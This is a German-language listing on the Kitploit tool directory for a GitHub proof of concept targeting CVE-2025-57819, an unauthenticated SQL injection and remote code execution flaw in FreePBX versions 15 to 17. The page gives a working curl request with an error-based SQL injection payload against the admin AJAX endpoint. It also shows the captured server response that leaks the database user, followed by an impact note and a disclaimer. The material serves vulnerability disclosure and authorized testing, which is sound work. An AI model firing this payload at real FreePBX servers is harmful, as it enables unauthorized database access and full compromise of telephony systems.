Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
SQL-Injection-and-RCE_CVE-2025-57819 — FreePBX-Versionen 15, 16 und 17 enthalten eine Schwachstelle zur Remotecodeausführung (RCE), die durch unzureichende Bereinigung von benutzergestellten Daten in Endpunkten verursacht wird. | Kitploit
Tools/GitHubGitHub/muhammadwaseem29/sql-injection-and-rce_cve-2025-57819
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHubmuhammadwaseem29/sql-injection-and-rce_cve-2025-57819

SQL-Injection-and-RCE_CVE-2025-57819

FreePBX-Versionen 15, 16 und 17 enthalten eine Schwachstelle zur Remotecodeausführung (RCE), die durch unzureichende Bereinigung von benutzergestellten Daten in Endpunkten verursacht wird.

Repository anzeigenWebseite
725vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

FreePBX RCE PoC (Nicht authentifiziert)

Zusammenfassung

FreePBX-Versionen 15, 16 und 17 enthalten eine Remote Code Execution (RCE)-Schwachstelle, die durch unzureichende Bereinigung von benutzergelieferten Daten in Endpunkten verursacht wird.
Ein nicht authentifizierter Angreifer kann die Datenbank manipulieren und Remote-Code-Ausführung erreichen. Der Exploit erfordert keine Authentifizierung.

Referenz

  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h

Beweis des Konzepts (PoC)

Hinweis: Das Ziel wurde geschwärzt. Ersetzen Sie [REDACTED_TARGET] durch den tatsächlichen Host, wenn Sie autorisierte Tests durchführen.

Anfrage

curl -i -k "https://[REDACTED_TARGET]/admin/ajax.php?module=FreePBX%5Cmodules%5Cendpoint%5Cajax&command=model&template=x&model=model&brand=x'+AND+EXTRACTVALUE(1,CONCAT('~USER:',(SELECT+USER()),'~'))+--+"

Antwort (Beispiel während des Tests erfasst)

HTTP/1.1 500 Internal Server Error
Date: Fri, 12 Sep 2025 08:35:29 GMT
Server: Apache/2.4.6 (Sangoma) OpenSSL/1.0.1e-fips PHP/5.6.31
X-Powered-By: PHP/5.6.31
Set-Cookie: PHPSESSID=fmt7o0oecththmves36nijvfu7; expires=Sun, 12-Oct-2025 08:35:29 GMT; Max-Age=2592000; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: application/json

{"error":{"type":"Exception","message":"SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~USER:freepbxuser@localhost~'::","file":"\/var\/www\/html\/admin\/libraries\/utility.functions.php","line":207}}

Warum dies es beweist: Die Antwort enthält ~USER:freepbxuser@localhost~ — bestätigt SQL-Injection / Datenoffenlegung aus einer nicht authentifizierten Anfrage.

carbon (1)

Auswirkungen

Nicht authentifizierte entfernte Datenbankmanipulation, die zur Ausführung beliebigen Codes auf dem Server führt — vollständige Systemkompromittierung möglich.


Haftungsausschluss

Dieses Repository und der PoC werden nur für Bildungszwecke und autorisierte Sicherheitsforschung bereitgestellt. Testen oder nutzen Sie Systeme nicht ohne ausdrückliche Erlaubnis. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diesen PoC entstehen.

Tool herunterladen